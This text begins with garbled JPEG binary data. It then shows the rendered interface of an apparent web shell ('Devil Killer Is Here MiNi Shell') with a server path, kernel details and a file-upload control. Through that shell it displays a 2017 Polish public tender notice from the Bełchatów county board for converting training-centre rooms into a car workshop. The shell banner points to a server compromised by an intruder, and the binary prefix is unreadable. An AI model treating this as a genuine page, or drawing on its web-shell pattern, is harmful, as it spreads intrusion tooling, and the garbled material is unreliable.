JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20170216/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20170216/26426-N-2017.html

<BR/><p>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia (jeżeli dotyczy):  </p><a class='base announcementNumber' href='http://www.powiat-belchatowski.pl' target='_blank'>http://www.powiat-belchatowski.pl</a><br/><hr class='linkedItemsSeparator' /><div class="divRow_xforms"><div>
              Ogłoszenie nr 26426 - 2017
              z dnia 2017-02-16 r.
            </div><div class="headerMedium_xforms" style="text-align: center">Bełchatów:  Przebudowa pomieszczeń budynku Centrum Kształcenia Praktycznego w Bełchatowie na pracownię samochodową<br />
            OGŁOSZENIE O ZAMÓWIENIU -
            
              Roboty budowlane
            </div><div><b>Zamieszczanie ogłoszenia:</b>
              obowiązkowe
            </div><div><b>Ogłoszenie dotyczy:</b>
              zamówienia publicznego
            </div><div><b>Zamówienie dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej </b><br /><div style="padding-left: 20px">
                nie
              </div><br /><b>Nazwa projektu lub programu</b><br /></div><div><b>O zamówienie mogą ubiegać się wyłącznie zakłady pracy chronionej oraz wykonawcy, których działalność, lub działalność ich wyodrębnionych organizacyjnie jednostek, które będą realizowały zamówienie, obejmuje  społeczną i zawodową integrację osób będących członkami grup społecznie marginalizowanych </b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Należy podać minimalny procentowy wskaźnik zatrudnienia osób należących do jednej lub więcej kategorii, o których mowa w art. 22 ust. 2 ustawy Pzp, nie mniejszy niż 30%, osób zatrudnionych przez zakłady pracy chronionej lub wykonawców albo ich jednostki (w %)
            <br /></div><div class="headerLarge_xforms" style="text-align: left"><u>SEKCJA I: ZAMAWIAJĄCY</u></div><div style="padding-left: 20px"><b>Postępowanie przeprowadza centralny zamawiający </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Postępowanie przeprowadza podmiot, któremu zamawiający powierzył/powierzyli przeprowadzenie postępowania </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Informacje na temat podmiotu któremu zamawiający powierzył/powierzyli prowadzenie postępowania:</b><br /><b>Postępowanie jest przeprowadzane wspólnie przez zamawiających</b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Jeżeli tak, należy wymienić zamawiających, którzy wspólnie przeprowadzają postępowanie oraz podać adresy ich siedzib, krajowe numery identyfikacyjne oraz osoby do kontaktów wraz z danymi do kontaktów:
            <br /><br /><b>Postępowanie jest przeprowadzane wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej </b><br /><div style="padding-left: 20px">
                nie
              </div><b>W przypadku przeprowadzania postępowania wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej  mające zastosowanie krajowe prawo zamówień publicznych:</b><br /><b>Informacje dodatkowe:</b><br /></div><div style="padding-left: 20px;"><div style="text-align: left"><b>I. 1) NAZWA I ADRES: </b>Zarząd Powiatu w Bełchatowie, krajowy numer identyfikacyjny
              59064842200000, ul.
              ul. Pabianicka 
              17/19,
              97400  
              Bełchatów, woj.
              łódzkie, państwo
              Polska, tel.
              044 6358600, e-mail
              kkonc@powiat-belchatowski.pl; mtomczak@powiat-belchatowski.pl, faks
              044 6358617.
              <br />
              Adres strony internetowej (URL): www.powiat-belchatowski.pl<br /><br /></div><div style="text-align: left"><b>I. 2) RODZAJ ZAMAWIAJĄCEGO: </b>
                Administracja samorządowa
              </div><div style="text-align: left"><b>
                I.3) WSPÓLNE UDZIELANIE ZAMÓWIENIA <i>(jeżeli dotyczy)</i>:
              </b><div style="padding-left: 20px">
                Podział obowiązków między zamawiającymi w przypadku wspólnego przeprowadzania postępowania, w tym
                w przypadku wspólnego przeprowadzania postępowania z zamawiającymi z innych państw członkowskich Unii Europejskiej (który z zamawiających jest odpowiedzialny za przeprowadzenie postępowania, czy i w jakim zakresie za przeprowadzenie postępowania odpowiadają pozostali zamawiający, czy zamówienie będzie udzielane przez każdego z zamawiających indywidualnie, czy zamówienie zostanie udzielone w imieniu i na rzecz pozostałych zamawiających):
                <br /></div></div><div style="text-align: left"><b>
                I.4) KOMUNIKACJA:
              </b><br /><b>Nieograniczony, pełny i bezpośredni dostęp do dokumentów z postępowania można uzyskać pod adresem (URL)</b><div style="padding-left: 20px">
                  nie
                <br /></div><br /><b>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia </b><div style="padding-left: 20px">
                  nie
                <br />www.powiat-belchatowski.pl</div><br /><b>Dostęp do dokumentów z postępowania jest ograniczony - więcej informacji można uzyskać pod adresem </b><div style="padding-left: 20px">
                  nie
                <br /></div><br /><b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu należy przesyłać:</b><br /><b>Elektronicznie</b><div style="padding-left: 20px">
                  nie
                <br />
                adres
                <br /></div><br /><div style="padding-left: 20px"><b>Dopuszczone jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  nie
                <br /><b>Wymagane jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  tak
                  <br />
                  Inny sposób:
                  <br />Ofertę należy złożyć w formie pisemnej: Adres: Starostwo Powiatowe w Bełchatowie, ul. Pabianicka 17/19 97-400 Bełchatów, Sekretariat III piętro<br />
                Adres:
                <br /></div><br /><b>Komunikacja elektroniczna wymaga korzystania z narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne</b><div style="padding-left: 20px">
                  nie
                <br />
                Nieograniczony, pełny, bezpośredni i bezpłatny dostęp do tych narzędzi można uzyskać pod adresem: (URL)
                <br /></div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA II: PRZEDMIOT ZAMÓWIENIA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><br /><b>II.1) Nazwa nadana zamówieniu przez zamawiającego: </b> Przebudowa pomieszczeń budynku Centrum Kształcenia Praktycznego w Bełchatowie na pracownię samochodową<br /><b>Numer referencyjny: </b>WI.272.1.2017<br /><b>Przed wszczęciem postępowania o udzielenie zamówienia przeprowadzono dialog techniczny </b><br /><div style="padding-left: 20px; text-align: justify">
                  nie
                </div><br /><b>II.2) Rodzaj zamówienia: </b>
                roboty budowlane
              <br /><b>II.3) Informacja o możliwości składania ofert częściowych</b><br />
              Zamówienie podzielone jest na części:
              <br /><div style="padding-left: 20px">
                  Nie
                </div><br /><br /><b>
                II.4) Krótki opis przedmiotu zamówienia
              </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań )</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:
              </b>Przedmiotem zamówienia jest przebudowa pomieszczeń w budynku Centrum Kształcenia 	Praktycznego na pracownię samochodową, mieszczącego się w Bełchatowie  przy ul. 	Czaplinieckiej 96
Charakterystyka obiektu:
Budynek Centrum Kształcenia praktycznego wykonany jest w systemie P 70. Pod względem konstrukcyjnym budynek składa się z czterech części w postaci ram o zróżnicowanych 	rozpiętościach i od dylatowanych od siebie. Konstrukcję budynku stanowią słupy i typowe 	dźwigary strunobetonowe o różnych rozpiętościach. Konstrukcję nośną dachu stanowią 	typowe płyty 	żebrowe, łączone wg systemu P 70.
Pomieszczenia podlegające przebudowie znajdują się w południowym  narożniku budynku. 	Część 	ta składa się z ramy jednonawowej o rozpiętości 9,0 [m], rozstawie 6,0 [m]. Obecnie 	w planowanej 	do przebudowy części budynku znajdują się następujące pomieszczenia: sale 	wykładowe, magazynki, korytarze, pokój nauczyciela, łazienka, pom. gospodarcze oraz 	wiatrołapy.
Budynek  jest wyposażony w instalacje wody ciepłej i zimnej, kanalizację, instalację 	elektryczną oraz co. Dach budynku pokryty papą.
Zakres robót:
Demontaż wyposażenia, 
Roboty rozbiórkowe,
	Roboty murowe  ścianki działowe, zamurowywanie otworów i uzupełnienia po wykuciach,
Roboty tynkarskie, 
Posadzki  wykonanie wylewek i okładzin, z  płytek gresowych,
Wykonanie dwóch płyt fundamentowych pod podnośniki samochodowe,
Okładziny ceramiczne ścian  płytki ceramiczne wg projektu,
Zabudowy GK i sufity podwieszane,
Malowanie ścian i sufitów,
Wymiana drzwi wewnętrznych z ościeżnicami,
Montaż 3 bram garażowych o powierzchni min. 3 [m] każda wg projektu,
Montaż urządzeń sanitarnych wraz z osprzętem i wyposażeniem, wg projektu,
Przebudowa instalacji wod-kan, co ( wymiana grzejników na nowe) wg 	projektu,
Wymiana instalacji elektrycznej wewnętrznej i zewnętrznej oświetlenia budynku, gniazd 	wtykowych, zasilania urządzeń elektrycznych, wewnętrznych linii zasilających, wg 	projektu,Wykonanie okablowania automatyki urządzeń wentylacyjnych wraz z zasileniem tych 	urządzeń,
Wykonanie wentylacji mechanicznej nawiewno-wywiewnej opartej o centralę podwieszaną 	z nagrzewnicą elektryczną oraz wentylator kanałowy wyposażony w regulator obrotów i 	moduł opóźnienia czasowego,
Wykonanie instalacji sprężonego powietrza wraz z montażem kompletnego urządzenia 	składającego się ze sprężarki śrubowej, osuszacza chłodniczego oraz zbiornika sprężonego 	powietrza,
Montaż miejscowego odciągu spalin i odprowadzenie ich na zewnątrz pomieszczenia<br /><br /><b>II.5) Główny kod CPV: </b>45000000-7<br /><b> Dodatkowe kody CPV:</b>45262300-4,
                45410000-4,
                45260000-7,
                45442200-9,
                45262500-6,
                45210000-2,
                45320000-6,
                45300000-0,
                45311200-2,
                45421100-5,
                45331100-7,
                45320000-6,
                45321000-3<br /><b>
                II.6) Całkowita wartość zamówienia </b><i>(jeżeli zamawiający podaje informacje o wartości zamówienia)</i>:
              
              <br />
              Wartość bez VAT:
              <br />
              Waluta:
              <br /><div style="padding-left: 20px"><br /><i>(w przypadku umów ramowych lub dynamicznego systemu zakupów  szacunkowa całkowita maksymalna wartość w całym okresie obowiązywania umowy ramowej lub dynamicznego systemu zakupów)</i></div><br /><b>
                II.7)
                Czy przewiduje się udzielenie zamówień, o których mowa w art. 67 ust. 1 pkt 6 i 7  lub w art. 134 ust. 6 pkt 3  ustawy Pzp:
              </b>
                nie
              <br /><b>II.8) Okres, w którym realizowane będzie zamówienie lub okres, na który została zawarta umowa ramowa lub okres, na który został ustanowiony dynamiczny system zakupów:</b><div style="padding-left: 20px">
                    Okres w miesiącach: 5<br /></div><br /><b>II.9) Informacje dodatkowe: </b>Szczegółowe opisy i dane techniczne dotyczące zakresu prac zawarte są w dokumentacji projektowej, szczegółowej specyfikacji wykonania i odbioru robót, 	przedmiarze robót.
Do obowiązków Wykonawcy jest szczegółowe zapoznanie się z w/w dokumentami oraz 	dokonanie wizji lokalnej w terenie. W przypadku rozbieżności Wykonawca w trakcie  	procedury przetargowej winien wystąpić do Zamawiającego z zapytaniem w terminie 	określonym w ustawie Pzp w celu 	wyjaśnienia treści 	SIWZ.</div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>
                III.1) WARUNKI UDZIAŁU W POSTĘPOWANIU
              </b><br /><div style="padding-left: 20px"><b>III.1.1) Kompetencje lub uprawnienia do prowadzenia określonej działalności zawodowej, o ile wynika to z odrębnych przepisów</b><br />
                Określenie warunków:
                Zamawiający nie stawia szczegółowych wymagań w tym zakresie.<br />
                Informacje dodatkowe
                <br /><b>III.1.2)  Sytuacja finansowa lub ekonomiczna  </b><br />
                Określenie warunków:
                Zamawiający nie stawia szczegółowych wymagań w tym zakresie.<br />
                Informacje dodatkowe
                <br /><b>III.1.3) Zdolność techniczna lub zawodowa </b><br />
                Określenie warunków:
                Zamawiający uzna że Wykonawca spełnił niniejszy warunek jeśli wykaże, że:
a) w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres 	prowadzenia działalności jest krótszy  w tym okresie, wykonał co najmniej 2 ( dwie ) 	roboty budowlane, w tym:
- co najmniej 1 ( jedną  ) robotę budowlaną o wartości minimum 150 000,00 zł brutto, 	z zastrzeżeniem, iż obejmowała ona swoim zakresem budowę, rozbudowę lub 	przebudowę budynku, w tym, łącznie:roboty wykończeniowe, instalacyjne ( branże: 	sanitarna i elektryczna ), budowlane wraz z wymianą stolarki otworowej budynku, 	konstrukcyjno-budowlane.
- co najmniej 1 ( jedną ) robotę budowlaną o wartości min 50 000,00 zł brutto 	obejmującą wykonanie i montaż, remont lub wymianę, instalacji wentylacji 	mechanicznej.
W przypadku gdy kwoty w złożonych dokumentach podane będą w innej walucie niż 	złoty polski  Zamawiający dokona przeliczenia tej kwoty na złote polskie na podstawie 	średniego kursu złotego w stosunku do walut obcych, określonego w Tabeli kursów 	Narodowego Banku Polskiego na dzień Wszczęcia postępowania.b) dysponuje osobami, które zostaną skierowane do realizacji zamówienia w szczególności, 	w rozumieniu przepisów ustawy z dnia 7 lipca 1994 r. - Prawo budowlane ( Dz.U. z 2016. 	poz. 290), posiadającymi uprawnienia budowlane: do kierowania robotami w specjalności 
- konstrukcyjno  budowlanej bez ograniczeń, co najmniej jedną osobą
- instalacyjnej w zakresie instalacji i urządzeń elektrycznych, co najmniej jedną osobą
- instalacyjnej w zakresie instalacji i urządzeń cieplnych, wodociągowych i 	kanalizacyjnych, co najmniej jedną osobą.<br />
                Zamawiający wymaga od wykonawców wskazania w ofercie lub we wniosku o dopuszczenie do udziału w postępowaniu imion i nazwisk osób wykonujących czynności przy realizacji zamówienia wraz z informacją o kwalifikacjach zawodowych lub doświadczeniu tych osób:
                
                  tak
                <br />
                Informacje dodatkowe:
                </div><b>
                III.2) PODSTAWY WYKLUCZENIA
              </b><br /><div style="padding-left: 20px"><b>III.2.1) Podstawy wykluczenia określone w art. 24 ust. 1  ustawy Pzp</b><br /><b>III.2.2) Zamawiający przewiduje wykluczenie wykonawcy na podstawie art. 24 ust. 5 ustawy Pzp</b>
                  nie
                <br /></div><b>
                III.3) WYKAZ OŚWIADCZEŃ SKŁADANYCH PRZEZ WYKONAWCĘ W CELU WSTĘPNEGO POTWIERDZENIA, ŻE NIE PODLEGA ON WYKLUCZENIU ORAZ SPEŁNIA WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ SPEŁNIA KRYTERIA SELEKCJI
              </b><br /><div style="padding-left: 20px"><b>
                  Oświadczenie o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu
                </b><br />
                  tak
                <br /><b>
                  Oświadczenie o spełnianiu kryteriów selekcji
                </b><br />
                  nie
                </div><b>
                III.4) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW , SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 3 USTAWY PZP:
              </b><br /><div style="padding-left: 20px">Składana przez Wykonawcę oferta, powinna być sporządzona zgodnie z wymogami Zamawiającego wskazanymi w Części X SIWZ. Oferta składa się z wypełnionego Formularza 	ofertowego o treści zgodnej ze wzorem stanowiącym Załącznik nr 1 do SIWZ.
2) Ponadto do oferty należy dołączyć:
a)Aktualne na dzień składania ofert oświadczenie Wykonawcy stanowiące wstępne potwierdzenie, że Wykonawca nie podlega wykluczeniu z postępowania oraz spełnia 	warunki udziału w postępowaniu w zakresie określonym przez Zamawiającego w Części 	IV, o treści zgodnej z wzorem stanowiącym Załącznik nr 2 do SIWZ.
b)Dokument  ( np. pełnomocnictwo, odpis z właściwego rejestru np. Krajowego rejestru Sądowego, Centralnej Ewidencji i Informacji o Działalności Gospodarczej Rzeczpospolitej Polskiej lub umowa spółki cywilnej itp. ) potwierdzający, że oferta została 	podpisana przez osobę/y uprawnioną/e do reprezentowania Wykonawcy, jeżeli nie wynika 	to z innych załączonych do oferty dokumentów. 
c)Jeżeli Wykonawca polega na zdolnościach lub sytuacji innych podmiotów , w celu wskazania braku istnienia wobec nich podstaw wykluczenia oraz spełniania, w zakresie, w jakim powołuje się na ich zasoby, warunków udziału w postępowaniu, zamieszcza informację o tych podmiotach w oświadczeniu, ( w załączniku nr 2 do SIWZ ), o 	którym mowa w pkt 1 ppkt 2 lit. a) SIWZ oraz musi udowodnić Zamawiającemu, że realizując zamówienie, będzie dysponował niezbędnymi zasobami tych podmiotów, w 	szczególności załączając do oferty zobowiązanie tych podmiotów do oddania mu do 	dyspozycji niezbędnych zasobów na potrzeby realizacji zamówienia. Zobowiązanie należy 	złożyć na piśmie w formie oryginału, a jego treść musi w sposób wyraźny i jednoznaczny 	wyrażać wolę oddania Wykonawcy ubiegającemu się o zamówienie odpowiedniego zasobu.
Zamawiający wymaga aby składany dokument wskazywał w szczególności:
- zakres dostępnych Wykonawcy zasobów innego podmiotu ( w przypadku udostępnienia 	osób zdolnych do wykonania zamówienia należy imiennie wskazać osoby, które będą uczestniczyć w wykonaniu zamówienia ),
- sposób wykorzystania zasobów innego podmiotu, przez Wykonawcę, przy wykonywaniu 	zamówienia publicznego,
- zakres i okres udziału innego podmiotu przy wykonywaniu zamówienia publicznego,
- czy podmiot, na zdolnościach którego Wykonawca polega, w odniesieniu do do warunków 	udziału w postępowaniu dotyczących kwalifikacji zawodowych lud doświadczenia, 	zrealizuje roboty budowlane, których wskazane zdolności dotyczą.
Wzór zobowiązania stanowi załącznik nr 3 do SIWZ.
	
W odniesieniu do warunków dotyczących kwalifikacji zawodowych lub doświadczenia, 	Wykonawcy mogą polegać na zdolnościach innych podmiotów, jeśli podmioty te zrealizują 	roboty budowlane, do realizacji których te zdolności są wymagane.</div><b>
                III.5) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 1 USTAWY PZP
              </b><br /><div style="padding-left: 20px"><b>III.5.1) W ZAKRESIE SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU:</b><br />Składana przez Wykonawcę oferta, powinna być sporządzona zgodnie z wymogami Zamawiającego wskazanymi w Części X SIWZ. Oferta składa się z wypełnionego Formularza 	ofertowego o treści zgodnej ze wzorem stanowiącym Załącznik nr 1 do SIWZ.
2) Ponadto do oferty należy dołączyć:
a)Aktualne na dzień składania ofert oświadczenie Wykonawcy stanowiące wstępne potwierdzenie, że Wykonawca nie podlega wykluczeniu z postępowania oraz spełnia 	warunki udziału w postępowaniu w zakresie określonym przez Zamawiającego w Części 	IV, o treści zgodnej z wzorem stanowiącym Załącznik nr 2 do SIWZ.
b)Dokument  ( np. pełnomocnictwo, odpis z właściwego rejestru np. Krajowego rejestru Sądowego, Centralnej Ewidencji i Informacji o Działalności Gospodarczej Rzeczpospolitej Polskiej lub umowa spółki cywilnej itp. ) potwierdzający, że oferta została 	podpisana przez osobę/y uprawnioną/e do reprezentowania Wykonawcy, jeżeli nie wynika 	to z innych załączonych do oferty dokumentów. 
c)Jeżeli Wykonawca polega na zdolnościach lub sytuacji innych podmiotów , w celu wskazania braku istnienia wobec nich podstaw wykluczenia oraz spełniania, w zakresie, w jakim powołuje się na ich zasoby, warunków udziału w postępowaniu, zamieszcza informację o tych podmiotach w oświadczeniu, ( w załączniku nr 2 do SIWZ ), o 	którym mowa w pkt 1 ppkt 2 lit. a) SIWZ oraz musi udowodnić Zamawiającemu, że realizując zamówienie, będzie dysponował niezbędnymi zasobami tych podmiotów, w 	szczególności załączając do oferty zobowiązanie tych podmiotów do oddania mu do 	dyspozycji niezbędnych zasobów na potrzeby realizacji zamówienia. Zobowiązanie należy 	złożyć na piśmie w formie oryginału, a jego treść musi w sposób wyraźny i jednoznaczny 	wyrażać wolę oddania Wykonawcy ubiegającemu się o zamówienie odpowiedniego zasobu.
Zamawiający wymaga aby składany dokument wskazywał w szczególności:
- zakres dostępnych Wykonawcy zasobów innego podmiotu ( w przypadku udostępnienia 	osób zdolnych do wykonania zamówienia należy imiennie wskazać osoby, które będą uczestniczyć w wykonaniu zamówienia ),
- sposób wykorzystania zasobów innego podmiotu, przez Wykonawcę, przy wykonywaniu 	zamówienia publicznego,
- zakres i okres udziału innego podmiotu przy wykonywaniu zamówienia publicznego,
- czy podmiot, na zdolnościach którego Wykonawca polega, w odniesieniu do do warunków 	udziału w postępowaniu dotyczących kwalifikacji zawodowych lud doświadczenia, 	zrealizuje roboty budowlane, których wskazane zdolności dotyczą.
Wzór zobowiązania stanowi załącznik nr 3 do SIWZ.
	
W odniesieniu do warunków dotyczących kwalifikacji zawodowych lub doświadczenia, 	Wykonawcy mogą polegać na zdolnościach innych podmiotów, jeśli podmioty te zrealizują 	roboty budowlane, do realizacji których te zdolności są wymagane.<br /><b>III.5.2) W ZAKRESIE KRYTERIÓW SELEKCJI:</b><br /></div><b>
                III.6) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 2 USTAWY PZP
              </b><br /><div style="padding-left: 20px">Wykonawca zobowiązany będzie do przedłożenia następujących oświadczeń i dokumentów:

a)	wykaz robót budowlanych, wykonanych nie wcześniej niż w okresie ostatnich 5 lat 	przed 	upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest 	krótszy w tym okresie, wraz z podaniem ich rodzaju, wartości, daty, miejsca wykonania i 	podmiotów, na rzecz których roboty te zostały wykonane, z załączeniem dowodów 	określających czy te 	roboty budowlane zostały wykonane należycie, w szczególności 	informacji o tym czy roboty zostały wykonane zgodnie z przepisami prawa budowlanego i 	prawidłowo ukończone, przy czym dowodami, o których mowa, są referencje bądź inne 	dokumenty wystawione przez podmiot , na rzecz którego roboty budowlane były 	wykonywane, a jeżeli z uzasadnionych przyczyny o obiektywnym charakterze Wykonawca 	nie jest w stanie uzyskać tych dokumentów  inne dokumenty. Wzór wykazu robót stanowi 	załącznik nr 6 do SIWZ.
b)	wykaz osób, skierowanych przez Wykonawcę do realizacji zamówienia publicznego, 	w szczególności odpowiedzialnych za kierowanie robotami budowlanymi, wraz z 	informacjami na temat tych kwalifikacji zawodowych, uprawnień, doświadczenia i 	wykształcenia niezbędnych do wykonania zamówienia publicznego, a także zakresu 	wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi 	osobami, o treści zgodnej ze wzorem stanowiącym załącznik nr 7 do SIWZ.
Wykonawcy ubiegający się wspólnie o udzielenie zamówienia ( Wykonawcy 	występujący wspólnie w rozumieniu art 23 ustawy PZP) są zobowiązani do ustanowienia 	Pełnomocnika do:
- reprezentowania ich w postępowaniu o udzielenie zamówienia , albo
- do reprezentowania w postępowaniu i zawarcia umowy w sprawie przedmiotowego 	zamówienia publicznego.
2)oryginał pełnomocnictwa lub jego kopii potwierdzonej za zgodność z 	oryginałem przez notariusza, powinien być załączony do oferty i zawierać w 	szczególności wskazanie:
a)	postępowania o zamówienie publiczne, którego dotyczy,b)	wszystkich Wykonawców ubiegających się wspólnie o udzielenia zamówienia 	wymienionych z nazwy z określeniem adresu siedziby,
c)	ustanowionego Pełnomocnika oraz zakresu jego umocowania.
3)	Dokument pełnomocnictwa musi być podpisany przez Wykonawców obiegających 	się wspólnie o udzielenie zamówienia . Podpisy muszą być złożone przez osoby 	uprawnione do składania oświadczeń woli wymienione we właściwym rejestrze lub 	ewidencji Wykonawców.
4)	Wykonawcy występujący wspólnie składają jedną ofertę, a oświadczenie o którym 	mowa w części V pkt 1 ppk 2 lit a) składa każdy z Wykonawców oddzielnie.
5)	Oświadczenia , formularze, dokumenty składa i podpisuje w imieniu wszystkich 	Wykonawców
